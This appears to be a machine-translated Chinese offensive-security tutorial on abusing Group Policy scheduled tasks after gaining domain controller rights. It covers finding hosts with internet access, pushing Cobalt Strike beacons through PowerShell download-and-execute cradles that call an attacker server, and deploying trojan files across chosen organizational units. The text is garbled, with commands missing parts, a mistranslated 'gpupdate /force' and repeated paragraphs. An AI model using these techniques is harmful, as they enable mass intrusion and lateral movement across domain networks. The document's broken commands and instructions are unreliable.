GPO组策略支持计划任务实现命令执行，找到域内出网机器

从2008年开始，GPO组策略对象开始支持计划任务，以方便管理域中的计算机和用户。 利用组策略的定时任务来实现命令执行，可以帮助我们在目标未联网的情况下批量查找域内联网的机器，也可以帮助我们实现指定OU的批量在线录入。

获得域控制权限后，可以使用组策略执行命令。 它有多种功能。 首先，当目标没有出网时，它可以找到出网的机器。 其次，它可以对指定的OU（比如运维部门）执行命令来寻找目标！

组策略计划任务的计算机配置和用户配置之间的区别

使用计算机配置创建计划任务时，只有服务器会在线应用策略，PC机不会应用策略。 但用户配置不会有此影响，策略可以在线应用。 因此，在实战中，建议使用用户配置。

使用计算机配置创建计划任务时，只有服务器会在线应用策略，PC机不会应用策略。 但用户配置不会有此影响，策略可以在线应用。 因此，在实战中，建议使用用户配置。 从一开始，使用计算机配置创建计划任务时，默认情况下该任务只能访问本地资源，这意味着它无法远程在线。 但用户配置不会有此影响，策略可以在线应用。 因此，在实战中，建议使用用户配置。 - 使用计算机配置时，选择一个用户（通常是域管理员），无论该用户是否登录都运行它，然后输入该用户的密码。 - 使用用户配置时，使用的用户是%%\%%，只有用户登录时才会运行。

组策略通过计划任务实现命令执行

管理工具->组策略管理，找到域->右键->在此域中创建GPO并链接到此处（C）

输入组策略名称，我命名为test

找到我们刚刚创建的组策略，右键->编辑

有计算机配置和用户配置两种类型。 我们可以选择用户配置：

- 用户配置——>首选项——>控制面板设置——>计划任务——>新建

计划任务有四种类型：

- 计划任务

- 即时任务（XP）

- 计划任务（至少）

- 即时任务（至少）

关于四个计划任务之间的差异：[(v%3dws.11)]((v%3Dws.11))

我们（至少）选择一个立即任务，该任务将被执行一次，然后被删除。 但是，每次目标主机刷新组策略时，都会再次执行此即时任务。 也就是说，除了手动触发组策略外，组策略会在用户每次登录机器时或每100分钟自动刷新一次。

然后使用%%\%%权限执行定时任务如下

显示主机名的命令如下：

c:\\\cmd.exe /c for /F %X in ('') do ping %

因此，每次刷新组策略时都会执行计划任务。 我们也可以手动强制执行。 在客户端执行以下命令强制刷新组策略。 组策略强制刷新后，可以在计划任务中看到立即执行的任务。

/力量

在这里我们可以接收请求

组策略通过计划任务实现批量在线命令

这里前面的步骤是一样的，主要操作在这里

在线命令如下：

C:\\\\v1.0\.exe -nop -w -c "IEX ((new-net.).(:80/a))"

或者

C:\\cmd.exe /c echo IEX ((new-net.).(:80/a)) | -

或者

客户端刷新组策略后，cs将以当前用户权限上线。

组策略执行文件

组策略可以执行exe、bat、vbs、ps1等文件，并将要执行的杀毒木马文件上传到下面指定目录

\\\\

然后执行程序时选择文件

当目标主机刷新组策略后，就会上线。